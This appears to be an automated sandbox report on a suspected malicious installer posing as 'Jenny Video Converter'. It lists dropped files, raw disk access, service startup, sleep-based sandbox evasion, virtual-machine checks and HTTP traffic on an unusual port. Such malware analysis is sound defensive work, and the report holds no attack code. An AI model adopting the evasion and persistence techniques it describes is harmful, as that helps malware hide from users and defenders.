        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\libsigc-2.0-0.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\is-D0HIN.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\is-0NOE7.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\is-FABCG.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\is-8PPAH.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\liblcms2-2.dll (copy)
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exe | File created: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\libpng16-16.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\libglibmm-2.4-1.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\libwinpthread-1.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\is-R14KT.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\is-I6MFQ.tmp
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | File created: C:\ProgramData\ET Ammeter Side 10.7.45\ET Ammeter Side 10.7.45.exe
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\libpcre-1.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\is-P1MHN.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\is-MCN70.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\is-G1ORK.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Temp\is-SQ448.tmp\_isetup\_setup64.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\libpango-1.0-0.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\libgomp-1.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\libpangoft2-1.0-0.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\is-CCK3H.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\librsvg-2-2.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\libgdk_pixbuf-2.0-0.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\is-DDT59.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\uninstall\unins000.exe (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\is-R59QM.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\zlib1.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\libgcc_s_dw2-1.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\is-IR87B.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\is-7MVDI.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\libpangocairo-1.0-0.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\libgdk-win32-2.0-0.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\is-S9SIF.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\libgobject-2.0-0.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\is-SPPOJ.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\libtiff-5.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\libjpeg-8.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\libgmodule-2.0-0.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\liblzma-5.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\is-73S5T.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\libpixman-1-0.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\is-O680T.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\is-E27ND.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\libintl-8.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\is-8J8L1.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Temp\is-SQ448.tmp\_isetup\_iscrypt.dll
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\libgraphite2.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\uninstall\is-SAKD7.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\is-AUN77.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\is-19DMT.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | File created: C:\Users\user\AppData\Local\Jenny Video Converter\is-8FEA4.tmp

        Boot Survival

        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 3_2_00401A4F
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 3_2_02D8F7D6
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Code function: 3_2_004027BE StartServiceCtrlDispatcherA, 3_2_004027BE

        Hooking and other Techniques for Hiding and Protection

        Source: unknown | Network traffic detected: HTTP traffic on port 2023 -> 63196
        Source: unknown | Network traffic detected: HTTP traffic on port 63196 -> 2023
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 2_2_00423C1C
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_004241EC IsIconic,SetActiveWindow,SetFocus, 2_2_004241EC
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_004241A4 IsIconic,SetActiveWindow, 2_2_004241A4
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 2_2_00418394
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 2_2_0042286C
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_004833BC IsIconic,GetWindowLongA,ShowWindow,ShowWindow, 2_2_004833BC
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_004175A8 IsIconic,GetCapture, 2_2_004175A8
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_00417CDE IsIconic,SetWindowPos, 2_2_00417CDE
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 2_2_00417CE0
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_0041F128 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary, 2_2_0041F128
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary, 3_2_00401B4B
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary, 3_2_02D8F8DA
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Window / User API: threadDelayed 9727
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-GR40U.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SQ448.tmp\_isetup\_shfoldr.dll
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SQ448.tmp\_isetup\_RegDLL.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libpangomm-1.4-1.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libpangowin32-1.0-0.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-KK58F.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-SBF1H.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libharfbuzz-0.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libgdkmm-2.4-1.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-3L92A.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libsigc-2.0-0.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-D0HIN.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-0NOE7.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-FABCG.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\liblcms2-2.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-8PPAH.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libpng16-16.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libglibmm-2.4-1.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libwinpthread-1.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-R14KT.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-I6MFQ.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libpcre-1.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-P1MHN.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-MCN70.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SQ448.tmp\_isetup\_setup64.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-G1ORK.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libpango-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libgomp-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libpangoft2-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-CCK3H.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\librsvg-2-2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libgdk_pixbuf-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\uninstall\unins000.exe (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-DDT59.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-R59QM.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\zlib1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libgcc_s_dw2-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-IR87B.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-7MVDI.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libpangocairo-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libgdk-win32-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-S9SIF.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libgobject-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libtiff-5.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-SPPOJ.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libjpeg-8.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libgmodule-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\liblzma-5.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-73S5T.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libpixman-1-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-E27ND.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-O680T.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libintl-8.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-8J8L1.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SQ448.tmp\_isetup\_iscrypt.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libgraphite2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\uninstall\is-SAKD7.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-AUN77.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-19DMT.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-8FEA4.tmpJump to dropped file
Source: C:\Users\user\Desktop\N6jsQ3XNNX.exe | Evasive API call chain: GetSystemTime,DecisionNodes (graph_0-5699)
Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess (graph_3-18325)
Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe TID: 4188 | Thread sleep count: 129 > 30
Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe TID: 4188 | Thread sleep time: -258000s >= -30000s
Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe TID: 5140 | Thread sleep count: 75 > 30
Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe TID: 5140 | Thread sleep time: -4500000s >= -30000s
Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe TID: 4188 | Thread sleep count: 9727 > 30
Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe TID: 4188 | Thread sleep time: -19454000s >= -30000s
Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | File opened: PhysicalDrive0
Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_00452A4C FindFirstFileA,GetLastError
Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_004751F8 FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_00464048 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode
Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_004644C4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode
Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_00462ABC FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_00497A74 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\N6jsQ3XNNX.exe | Code function: 0_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery
Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Thread delayed: delay time: 60000
Source: jennyvideoconverter32_64.exe, 00000003.00000002.3335978046.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, jennyvideoconverter32_64.exe, 00000003.00000002.3335978046.000000000087E000.00000004.00000020.00020000.00000000.sdmp, jennyvideoconverter32_64.exe, 00000003.00000002.3335978046.0000000000899000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\N6jsQ3XNNX.exe | API call chain: ExitProcess graph end node (graph_0-6739)
